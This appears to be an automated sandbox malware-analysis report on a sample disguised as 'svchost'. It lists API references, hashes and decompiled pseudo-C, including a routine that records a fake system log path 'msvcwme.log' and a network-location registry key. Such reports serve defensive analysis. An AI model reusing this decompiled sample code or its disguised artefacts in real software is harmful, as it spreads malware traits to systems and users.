                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F41
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F4E
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,039A720A,00000000,039A732A), ref: 039AF5F9
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                • String ID:
                                                • API String ID: 1663032902-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                • EnumSystemLocalesW.KERNEL32(039AFA11,00000001,?,?,039A7203,?,039AFDB2,039A7203,?,?,?,?,?,039A7203,?,?), ref: 039AF780
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID:
                                                • API String ID: 1084509184-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 039A3068: RtlEnterCriticalSection.NTDLL(-00030ACA), ref: 039A3077
                                                • EnumSystemLocalesW.KERNEL32(039A4DAA,00000001,039BEEA8,0000000C), ref: 039A4E28
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                • String ID:
                                                • API String ID: 1272433827-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                • EnumSystemLocalesW.KERNEL32(039AF5A5,00000001,?,?,?,039AFE10,039A7203,?,?,?,?,?,039A7203,?,?,?), ref: 039AF685
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID:
                                                • API String ID: 1084509184-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E6FD54430(void* __ecx, void* __edx, void* __eflags) {
                                                				signed int _v8;
                                                				char _v16;
                                                				void* _v20;
                                                				void* _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				struct _CRITICAL_SECTION _v60;
                                                				char _v64;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t94;
                                                				intOrPtr* _t104;
                                                				signed int _t105;
                                                				long _t106;
                                                				intOrPtr* _t116;
                                                				signed int _t117;
                                                				long _t118;
                                                				intOrPtr* _t123;
                                                				signed int _t125;
                                                				long _t126;
                                                				intOrPtr* _t131;
                                                				signed int _t133;
                                                				long _t134;
                                                				intOrPtr* _t139;
                                                				signed int _t140;
                                                				long _t141;
                                                				void* _t143;
                                                				signed int _t152;
                                                				signed int _t154;
                                                				void* _t161;
                                                				void* _t164;
                                                				intOrPtr _t165;
                                                				void* _t166;
                                                				intOrPtr* _t171;
                                                				signed int _t172;
                                                				signed int _t173;
                                                				signed int _t174;
                                                				void* _t180;
                                                				signed int _t181;
                                                				signed int _t182;
                                                				signed int _t183;
                                                				void* _t185;
                                                				intOrPtr* _t186;
                                                				intOrPtr* _t187;
                                                				intOrPtr* _t188;
                                                				intOrPtr* _t189;
                                                				intOrPtr* _t190;
                                                				intOrPtr* _t194;
                                                				intOrPtr* _t196;
                                                				intOrPtr* _t197;
                                                				void* _t198;
                                                				intOrPtr* _t199;
                                                				void* _t200;
                                                				intOrPtr* _t201;
                                                				void* _t202;
                                                				intOrPtr* _t203;
                                                				void* _t204;
                                                				signed int _t206;
                                                				signed int _t207;
                                                				void* _t208;
                                                				void* _t211;
                                                				void* _t212;
                                                				void* _t216;
                                                				void* _t218;
                                                				void* _t220;
                                                				void* _t222;
                                                
                                                				_push(0xffffffff);
                                                				_push(E6FD605D8);
                                                				_push( *[fs:0x0]);
                                                				_t94 =  *0x6fd68008; // 0xc92c5105
                                                				_push(_t94 ^ _t207);
                                                				 *[fs:0x0] =  &_v16;
                                                				_t185 = __edx;
                                                				_t161 = __ecx;
                                                				_t2 = _t185 + 1; // 0x1
                                                				_t193 = _t2;
                                                				_v24 = LocalAlloc(0x40, _t2);
                                                				E6FD57920(_t185, LocalAlloc, 0, _t193);
                                                				_t162 = _v24;
                                                				E6FD5FDE0(_v24, _t161, _t185);
                                                				_v64 = 0x6fd65f50;
                                                				InitializeCriticalSection( &_v60);
                                                				_v36 = 0;
                                                				_v32 = 0;
                                                				_v28 = 0;
                                                				_v8 = 0;
                                                				E6FD541E0(_t162, _t185,  &_v64);
                                                				_t211 = _t208 - 0x30 + 0x1c;
                                                				if(_v32 >= 3) {
                                                					EnterCriticalSection(0x6fd6ac54);
                                                					_t104 = E6FD559AF(_t193, __eflags, 0xc);
                                                					_t194 = 0x6fd6b720;
                                                					_t186 = _t104;
                                                					_t212 = _t211 + 4;
                                                					_v20 = _t186;
                                                					do {
                                                						_t105 =  *_t194;
                                                						_t194 = _t194 + 1;
                                                						__eflags = _t105;
                                                					} while (_t105 != 0);
                                                					_t195 = _t194 - 0x6fd6b721;
                                                					 *_t186 = 7;
                                                					_t106 = _t194 - 0x6fd6b721 + 1;
                                                					 *(_t186 + 4) = _t106;
                                                					 *((intOrPtr*)(_t186 + 8)) = LocalAlloc(0x40, _t106);
                                                					E6FD57920(_t186, _t107, 0,  *(_t186 + 4));
                                                					E6FD5FDE0( *((intOrPtr*)(_t186 + 8)), "C:\Windows\system32\msvcwme.log", _t195);
                                                					E6FD54AE0(0x6fd6b721, _t186);
                                                					_t196 = E6FD559AF(_t195, __eflags, 0xc);
                                                					_v20 = _t196;
                                                					 *_t196 = 8;
                                                					 *(_t196 + 4) = 0x46;
                                                					 *((intOrPtr*)(_t196 + 8)) = LocalAlloc(0x40, 0x46);
                                                					E6FD57920(_t186, _t112, 0,  *(_t196 + 4));
                                                					E6FD5FDE0( *((intOrPtr*)(_t196 + 8)), "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0x45);
                                                					E6FD54AE0(0x6fd6b721, _t196);
                                                					_t116 = E6FD559AF(_t196, __eflags, 0xc);
                                                					_t171 = _v36;
                                                					_t197 = 0;
                                                					_t216 = _t212 + 0x38;
                                                					_t187 = _t116;
                                                					_v20 = _t187;
                                                					__eflags = _v32;
                                                					if(_v32 > 0) {
                                                						_t197 =  *_t171;
                                                					}
                                                					_t28 = _t197 + 1; // 0x1
                                                					_t180 = _t28;
                                                					do {
                                                						_t117 =  *_t197;
                                                						_t197 = _t197 + 1;
                                                						__eflags = _t117;
                                                					} while (_t117 != 0);
                                                					_t198 = _t197 - _t180;
                                                					_v20 = 0;
                                                					__eflags = _v32;
                                                					if(_v32 > 0) {
                                                						_v20 =  *_t171;
                                                					}
                                                					_t32 = _t198 + 1; // 0x2
                                                					_t118 = _t32;
                                                					 *_t187 = 0xb;
                                                					 *(_t187 + 4) = _t118;
                                                					 *((intOrPtr*)(_t187 + 8)) = LocalAlloc(0x40, _t118);
                                                					E6FD57920(_t187, _t119, 0,  *(_t187 + 4));
                                                					E6FD5FDE0( *((intOrPtr*)(_t187 + 8)), _v20, _t198);
                                                					E6FD54AE0(_t171, _t187);
                                                					_t123 = E6FD559AF(_t198, __eflags, 0xc);
                                                					_t181 = _v32;
                                                					_t218 = _t216 + 0x1c;
                                                					_t172 = _v36;
                                                					_t188 = _t123;
                                                					_t199 = 0;
                                                					_v20 = _t188;
                                                					__eflags = _t181 - 1;
                                                					if(_t181 > 1) {
                                                						_t199 =  *((intOrPtr*)(_t172 + 4));
                                                					}
                                                					_t42 = _t199 + 1; // 0x1
                                                					_v20 = _t42;
                                                					do {
                                                						_t125 =  *_t199;
                                                						_t199 = _t199 + 1;
                                                						__eflags = _t125;
                                                					} while (_t125 != 0);
                                                					_t200 = _t199 - _v20;
                                                					_v20 = 0;
                                                					__eflags = _t181 - 1;
                                                					if(_t181 > 1) {
                                                						_v20 =  *((intOrPtr*)(_t172 + 4));
                                                					}
                                                					_t48 = _t200 + 1; // 0x1
                                                					_t126 = _t48;
                                                					 *_t188 = 9;
                                                					 *(_t188 + 4) = _t126;
                                                					 *((intOrPtr*)(_t188 + 8)) = LocalAlloc(0x40, _t126);
                                                					E6FD57920(_t188, _t127, 0,  *(_t188 + 4));
                                                					E6FD5FDE0( *((intOrPtr*)(_t188 + 8)), _v20, _t200);
                                                					E6FD54AE0(_t172, _t188);
                                                					_t131 = E6FD559AF(_t200, __eflags, 0xc);
                                                					_t182 = _v32;
                                                					_t220 = _t218 + 0x1c;
                                                					_t173 = _v36;
                                                					_t189 = _t131;
                                                					_t201 = 0;
                                                					_v20 = _t189;
                                                					__eflags = _t182 - 2;
                                                					if(_t182 > 2) {
                                                						_t201 =  *((intOrPtr*)(_t173 + 8));
                                                					}
                                                					_t58 = _t201 + 1; // 0x1
                                                					_v20 = _t58;
                                                					do {
                                                						_t133 =  *_t201;
                                                						_t201 = _t201 + 1;
                                                						__eflags = _t133;
                                                					} while (_t133 != 0);
                                                					_t202 = _t201 - _v20;
                                                					_v20 = 0;
                                                					__eflags = _t182 - 2;
                                                					if(_t182 > 2) {
                                                						_v20 =  *((intOrPtr*)(_t173 + 8));
                                                					}
                                                					_t64 = _t202 + 1; // 0x1
                                                					_t134 = _t64;
                                                					 *_t189 = 0xa;
                                                					 *(_t189 + 4) = _t134;
                                                					 *((intOrPtr*)(_t189 + 8)) = LocalAlloc(0x40, _t134);
                                                					E6FD57920(_t189, _t135, 0,  *(_t189 + 4));
                                                					E6FD5FDE0( *((intOrPtr*)(_t189 + 8)), _v20, _t202);
                                                					E6FD54AE0(_t173, _t189);
                                                					_t139 = E6FD559AF(_t202, __eflags, 0xc);
                                                					_t183 = _v32;
                                                					_t222 = _t220 + 0x1c;
                                                					_t174 = _v36;
                                                					_t190 = _t139;
                                                					_t203 = 0;
                                                					_v20 = _t190;
                                                					__eflags = _t183 - 3;
                                                					if(_t183 > 3) {
                                                						_t203 =  *((intOrPtr*)(_t174 + 0xc));
                                                					}
                                                					_t74 = _t203 + 1; // 0x1
                                                					_t164 = _t74;
                                                					do {
                                                						_t140 =  *_t203;
                                                						_t203 = _t203 + 1;
                                                						__eflags = _t140;
                                                					} while (_t140 != 0);
                                                					_t204 = _t203 - _t164;
                                                					_t165 = 0;
                                                					__eflags = _t183 - 3;
                                                					if(_t183 > 3) {
                                                						_t165 =  *((intOrPtr*)(_t174 + 0xc));
                                                					}
                                                					_t76 = _t204 + 1; // 0x2
                                                					_t141 = _t76;
                                                					 *_t190 = 0xc;
                                                					 *(_t190 + 4) = _t141;
                                                					_t143 = LocalAlloc(0x40, _t141);
                                                					 *((intOrPtr*)(_t190 + 8)) = LocalAlloc;
                                                					E6FD57920(_t190, _t143, 0,  *(_t190 + 4));
                                                					E6FD5FDE0( *((intOrPtr*)(_t190 + 8)), _t165, _t204);
                                                					_t211 = _t222 + 0x18;
                                                					E6FD54AE0(_t174, _t190);
                                                					LeaveCriticalSection(0x6fd6ac54);
                                                					__eflags = _v28 - 0x14;
                                                					_v32 = 0;
                                                					if(_v28 >= 0x14) {
                                                						_t206 = _v36;
                                                						_push(0x28);
                                                						_t152 = E6FD58E7B(_t174);
                                                						_t211 = _t211 + 4;
                                                						_v36 = _t152;
                                                						__eflags = _t152;
                                                						if(_t152 != 0) {
                                                							__eflags = _t206;
                                                							if(_t206 != 0) {
                                                								_t178 = _v32 << 2;
                                                								__eflags = _v32 << 2;
                                                								E6FD5FDE0(_t152, _t206, _t178);
                                                								L6FD58E76(_t206);
                                                								_t211 = _t211 + 0x10;
                                                							}
                                                							_t154 = _v32 + 0xa;
                                                							__eflags = _t154;
                                                							_v28 = _t154;
                                                						}
                                                					}
                                                					LocalFree(_v24);
                                                					_t166 = 1;
                                                					L34:
                                                					_v64 = 0x6fd65f50;
                                                					DeleteCriticalSection( &_v60);
                                                					_t149 = _v36;
                                                					if(_v36 != 0) {
                                                						L6FD58E76(_t149);
                                                					}
                                                					 *[fs:0x0] = _v16;
                                                					return _t166;
                                                				}
                                                				_t166 = 0;
                                                				goto L34;
                                                			}

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?), ref: 6FD5448E
                                                • EnterCriticalSection.KERNEL32(6FD6AC54), ref: 6FD544D0
                                                • new.LIBCMT ref: 6FD544D8
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 6FD5450E
                                                • new.LIBCMT ref: 6FD54537
                                                • LocalAlloc.KERNEL32(00000040,00000046,00000000), ref: 6FD54555
                                                • new.LIBCMT ref: 6FD5457F
                                                • LocalAlloc.KERNEL32(00000040,00000002,00000000), ref: 6FD545CA
                                                • new.LIBCMT ref: 6FD545F1
                                                • DeleteCriticalSection.KERNEL32(?), ref: 6FD547B2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: AllocCriticalLocalSection$DeleteEnterInitialize
                                                • String ID: C:\Windows\system32\msvcwme.log$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 53876381-3836515607
                                                • Opcode ID: d07620e8e10011f81d70230bd5449a03aee8ec0c4a33a0a48817592b916af4d8
                                                • Instruction ID: 5566c3b1d006d7b4b8012db9476d6516ec264bdd1a1d08a3ab8833c1a2663481
                                                • Opcode Fuzzy Hash: d07620e8e10011f81d70230bd5449a03aee8ec0c4a33a0a48817592b916af4d8
                                                • Instruction Fuzzy Hash: 46C19EB5C00316AFDF508FA4CC54BAEBBB5FF06308F108519E919A7281D776B825CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E6FD56AA8(signed int* __ecx, signed int __edx, intOrPtr* _a4, intOrPtr _a8, signed int* _a12, intOrPtr _a16, signed int* _a20, char _a24, intOrPtr _a28, signed int _a32) {
                                                				intOrPtr _v0;
                                                				intOrPtr _v4;
                                                				char _v5;
                                                				char _v12;
                                                				char _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				char _v44;
                                                				char _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				intOrPtr _v60;
                                                				char _v72;
                                                				intOrPtr* _v80;
                                                				signed int _v100;
                                                				signed int* _v144;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				char _t190;
                                                				signed int* _t198;
                                                				intOrPtr* _t199;
                                                				signed int _t202;
                                                				signed int _t206;
                                                				intOrPtr* _t210;
                                                				signed int _t211;
                                                				signed int _t212;
                                                				signed int _t214;
                                                				signed int _t215;
                                                				signed int _t217;
                                                				signed int _t221;
                                                				void* _t225;
                                                				signed int _t227;
                                                				void* _t231;
                                                				void* _t233;
                                                				char _t234;
                                                				signed int* _t236;
                                                				signed int _t237;
                                                				signed int _t238;
                                                				signed int _t240;
                                                				signed int _t244;
                                                				void* _t246;
                                                				void* _t248;
                                                				void* _t251;
                                                				intOrPtr _t253;
                                                				intOrPtr _t254;
                                                				void* _t256;
                                                				char _t257;
                                                				signed int _t263;
                                                				char* _t267;
                                                				intOrPtr _t273;
                                                				signed int _t278;
                                                				signed int _t279;
                                                				signed int _t282;
                                                				char _t283;
                                                				intOrPtr _t285;
                                                				signed int _t287;
                                                				signed int* _t289;
                                                				intOrPtr* _t290;
                                                				signed int* _t292;
                                                				signed int _t294;
                                                				intOrPtr _t300;
                                                				intOrPtr* _t304;
                                                				signed int _t305;
                                                				void* _t306;
                                                				signed int* _t310;
                                                				void* _t313;
                                                				void* _t314;
                                                				void* _t316;
                                                				void* _t317;
                                                				void* _t318;
                                                				void* _t319;
                                                
                                                				_t282 = __edx;
                                                				_t264 = __ecx;
                                                				_t253 = _a8;
                                                				_push(_t304);
                                                				_t289 = _a20;
                                                				_v44 = 0;
                                                				_v5 = 0;
                                                				if(_t289[1] > 0x80) {
                                                					_t190 =  *((intOrPtr*)(_t253 + 8));
                                                				} else {
                                                					_t190 =  *((char*)(_t253 + 8));
                                                				}
                                                				_v12 = _t190;
                                                				if(_t190 < 0xffffffff || _t190 >= _t289[1]) {
                                                					L62:
                                                					E6FD59ED0(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                					goto L63;
                                                				} else {
                                                					_t304 = _a4;
                                                					if( *_t304 != 0xe06d7363) {
                                                						_t264 = _a12;
                                                						goto L57;
                                                					} else {
                                                						if( *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
                                                							L23:
                                                							_t264 = _a12;
                                                							_v16 = _t264;
                                                							goto L25;
                                                						} else {
                                                							_t328 =  *((intOrPtr*)(_t304 + 0x1c));
                                                							if( *((intOrPtr*)(_t304 + 0x1c)) != 0) {
                                                								goto L23;
                                                							} else {
                                                								_t225 = E6FD580E6(_t253, _t264, _t282, _t289, _t304, _t328);
                                                								_t329 =  *((intOrPtr*)(_t225 + 0x10));
                                                								if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
                                                									L61:
                                                									return _t225;
                                                								} else {
                                                									_t304 =  *((intOrPtr*)(E6FD580E6(_t253, _t264, _t282, _t289, _t304, _t329) + 0x10));
                                                									_t246 = E6FD580E6(_t253, _t264, _t282, _t289, _t304, _t329);
                                                									_v44 = 1;
                                                									_v16 =  *((intOrPtr*)(_t246 + 0x14));
                                                									if(_t304 == 0) {
                                                										goto L62;
                                                									} else {
                                                										if( *_t304 != 0xe06d7363 ||  *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
                                                											L19:
                                                											_t248 = E6FD580E6(_t253, _t264, _t282, _t289, _t304, _t336);
                                                											_t337 =  *((intOrPtr*)(_t248 + 0x1c));
                                                											if( *((intOrPtr*)(_t248 + 0x1c)) == 0) {
                                                												L24:
                                                												_t264 = _v16;
                                                												_t190 = _v12;
                                                												L25:
                                                												__eflags =  *_t304 - 0xe06d7363;
                                                												if( *_t304 != 0xe06d7363) {
                                                													L57:
                                                													__eflags = _t289[3];
                                                													if(__eflags <= 0) {
                                                														goto L60;
                                                													} else {
                                                														__eflags = _a24;
                                                														if(__eflags != 0) {
                                                															goto L62;
                                                														} else {
                                                															_push(_a32);
                                                															_push(_a28);
                                                															_push(_t190);
                                                															_push(_t289);
                                                															_push(_a16);
                                                															_push(_t264);
                                                															_push(_t253);
                                                															_push(_t304);
                                                															L66();
                                                															_t316 = _t316 + 0x20;
                                                															goto L60;
                                                														}
                                                													}
                                                												} else {
                                                													__eflags =  *((intOrPtr*)(_t304 + 0x10)) - 3;
                                                													if( *((intOrPtr*)(_t304 + 0x10)) != 3) {
                                                														goto L57;
                                                													} else {
                                                														__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930520;
                                                														if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930520) {
                                                															L30:
                                                															__eflags = _t289[3];
                                                															if(_t289[3] > 0) {
                                                																_t264 =  &_v28;
                                                																_t233 = E6FD58349( &_v28, _t289, _a28, _t190,  &_v28,  &_v48);
                                                																_t282 = _v28;
                                                																_t316 = _t316 + 0x14;
                                                																__eflags = _t282 - _v48;
                                                																if(_t282 < _v48) {
                                                																	_t47 = _t233 + 0x10; // 0x10
                                                																	_t278 = _t47;
                                                																	_t234 = _v12;
                                                																	_v36 = _t278;
                                                																	do {
                                                																		_t50 = _t278 - 0x10; // 0x0
                                                																		_v60 = _t50;
                                                																		_t289 = _a20;
                                                																		__eflags =  *((intOrPtr*)(_t278 - 0x10)) - _t234;
                                                																		if( *((intOrPtr*)(_t278 - 0x10)) <= _t234) {
                                                																			__eflags = _t234 -  *((intOrPtr*)(_t278 - 0xc));
                                                																			if(_t234 <=  *((intOrPtr*)(_t278 - 0xc))) {
                                                																				_v24 =  *_t278;
                                                																				_t263 =  *(_t278 - 4);
                                                																				__eflags = _t263;
                                                																				_v32 = _t263;
                                                																				_t253 = _a8;
                                                																				if(_t263 > 0) {
                                                																					_t279 = _v24;
                                                																					_t236 =  *( *((intOrPtr*)(_t304 + 0x1c)) + 0xc);
                                                																					_t287 =  *_t236;
                                                																					_t237 =  &(_t236[1]);
                                                																					__eflags = _t237;
                                                																					_v52 = _t237;
                                                																					_t238 = _v32;
                                                																					_v56 = _t287;
                                                																					while(1) {
                                                																						_v20 = _v52;
                                                																						_t289 = _a20;
                                                																						_v40 = _t287;
                                                																						__eflags = _t287;
                                                																						if(_t287 <= 0) {
                                                																							goto L41;
                                                																						} else {
                                                																							goto L38;
                                                																						}
                                                																						while(1) {
                                                																							L38:
                                                																							_t240 = E6FD573F5(_t279,  *_v20,  *((intOrPtr*)(_t304 + 0x1c)));
                                                																							_t316 = _t316 + 0xc;
                                                																							__eflags = _t240;
                                                																							if(_t240 != 0) {
                                                																								break;
                                                																							}
                                                																							_v20 = _v20 + 4;
                                                																							_t244 = _v40 - 1;
                                                																							_t279 = _v24;
                                                																							_v40 = _t244;
                                                																							__eflags = _t244;
                                                																							if(_t244 > 0) {
                                                																								continue;
                                                																							} else {
                                                																								_t238 = _v32;
                                                																								goto L41;
                                                																							}
                                                																							L44:
                                                																							_t282 = _v28;
                                                																							_t278 = _v36;
                                                																							_t234 = _v12;
                                                																							goto L45;
                                                																						}
                                                																						_push(_v44);
                                                																						_v5 = 1;
                                                																						E6FD569E3(_t253, _t287, _t304, _t253, _v16, _a16, _t289, _v24,  *_v20, _v60, _a28, _a32);
                                                																						_t316 = _t316 + 0x2c;
                                                																						goto L44;
                                                																						L41:
                                                																						_t238 = _t238 - 1;
                                                																						_t279 = _t279 + 0x10;
                                                																						_v32 = _t238;
                                                																						_v24 = _t279;
                                                																						__eflags = _t238;
                                                																						if(_t238 > 0) {
                                                																							_t287 = _v56;
                                                																							_v20 = _v52;
                                                																							_t289 = _a20;
                                                																							_v40 = _t287;
                                                																							__eflags = _t287;
                                                																							if(_t287 <= 0) {
                                                																								goto L41;
                                                																							} else {
                                                																								goto L38;
                                                																							}
                                                																						}
                                                																						goto L44;
                                                																					}
                                                																				}
                                                																			}
                                                																		}
                                                																		L45:
                                                																		_t282 = _t282 + 1;
                                                																		_t278 = _t278 + 0x14;
                                                																		_v28 = _t282;
                                                																		_v36 = _t278;
                                                																		__eflags = _t282 - _v48;
                                                																	} while (_t282 < _v48);
                                                																}
                                                															}
                                                															__eflags = _a24;
                                                															if(__eflags != 0) {
                                                																_push(1);
                                                																E6FD5670F(__eflags);
                                                																_t264 = _t304;
                                                															}
                                                															__eflags = _v5;
                                                															if(__eflags != 0) {
                                                																L60:
                                                																_t225 = E6FD580E6(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																__eflags =  *(_t225 + 0x1c);
                                                																if(__eflags != 0) {
                                                																	goto L62;
                                                																} else {
                                                																	goto L61;
                                                																}
                                                															} else {
                                                																_t227 =  *_t289 & 0x1fffffff;
                                                																__eflags = _t227 - 0x19930521;
                                                																if(__eflags < 0) {
                                                																	goto L60;
                                                																} else {
                                                																	__eflags = _t289[7];
                                                																	if(_t289[7] != 0) {
                                                																		L52:
                                                																		__eflags = _t289[8] & 0x00000004;
                                                																		if(__eflags != 0) {
                                                																			goto L62;
                                                																		} else {
                                                																			_push(_t289[7]);
                                                																			L86();
                                                																			_t264 = _t304;
                                                																			__eflags = _t227;
                                                																			if(__eflags != 0) {
                                                																				goto L60;
                                                																			} else {
                                                																				E6FD580E6(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																				E6FD580E6(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																				 *((intOrPtr*)(E6FD580E6(_t253, _t264, _t282, _t289, _t304, __eflags) + 0x10)) = _t304;
                                                																				_t231 = E6FD580E6(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																				__eflags = _a32;
                                                																				_t267 = _v16;
                                                																				_push(_t304);
                                                																				 *((intOrPtr*)(_t231 + 0x14)) = _t267;
                                                																				if(_a32 != 0) {
                                                																					goto L64;
                                                																				} else {
                                                																					_push(_t253);
                                                																				}
                                                																				goto L65;
                                                																			}
                                                																		}
                                                																	} else {
                                                																		__eflags = _t289[8] & 0x00000004;
                                                																		if(__eflags == 0) {
                                                																			goto L60;
                                                																		} else {
                                                																			goto L52;
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                														} else {
                                                															__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930521;
                                                															if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930521) {
                                                																goto L30;
                                                															} else {
                                                																__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930522;
                                                																if( *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
                                                																	goto L57;
                                                																} else {
                                                																	goto L30;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											} else {
                                                												_v36 =  *((intOrPtr*)(E6FD580E6(_t253, _t264, _t282, _t289, _t304, _t337) + 0x1c));
                                                												_t251 = E6FD580E6(_t253, _t264, _t282, _t289, _t304, _t337);
                                                												_push(_v36);
                                                												_push(_t304);
                                                												 *(_t251 + 0x1c) =  *(_t251 + 0x1c) & 0x00000000;
                                                												L86();
                                                												if(_t251 != 0) {
                                                													goto L24;
                                                												} else {
                                                													_push(_v36);
                                                													L99();
                                                													_pop(_t264);
                                                													_t339 = _t251;
                                                													if(_t251 == 0) {
                                                														goto L62;
                                                													} else {
                                                													}
                                                													L63:
                                                													_push(1);
                                                													_push(_t304);
                                                													E6FD5670F(_t339);
                                                													_t267 =  &_v72;
                                                													E6FD567C4(_t267);
                                                													E6FD578AD( &_v72, 0x6fd669b4);
                                                													L64:
                                                													_push(_a32);
                                                													L65:
                                                													E6FD583F3(_t267);
                                                													_push(_a16);
                                                													_push(_t253);
                                                													E6FD57231(_t253, _t267, _t282, _t289, _t339);
                                                													_t317 = _t316 + 0x10;
                                                													_push(_t289[7]);
                                                													_t198 = E6FD569A9(_t253, _t267, _t282, _t289, _t304, _t339);
                                                													asm("int3");
                                                													_t313 = _t317;
                                                													_push(_t267);
                                                													_push(_t267);
                                                													_push(_t289);
                                                													_t290 = _v80;
                                                													_t340 =  *_t290 - 0x80000003;
                                                													if( *_t290 == 0x80000003) {
                                                														L84:
                                                														return _t198;
                                                													} else {
                                                														_push(_t253);
                                                														_push(_t304);
                                                														_t199 = E6FD580E6(_t253, _t267, _t282, _t290, _t304, _t340);
                                                														_t254 = _a16;
                                                														_t341 =  *((intOrPtr*)(_t199 + 8));
                                                														if( *((intOrPtr*)(_t199 + 8)) == 0) {
                                                															L72:
                                                															if( *((intOrPtr*)(_t254 + 0xc)) == 0) {
                                                																E6FD59ED0(_t254, _t267, _t282, _t290, _t304, __eflags);
                                                																asm("int3");
                                                																_push(_t313);
                                                																_t314 = _t317;
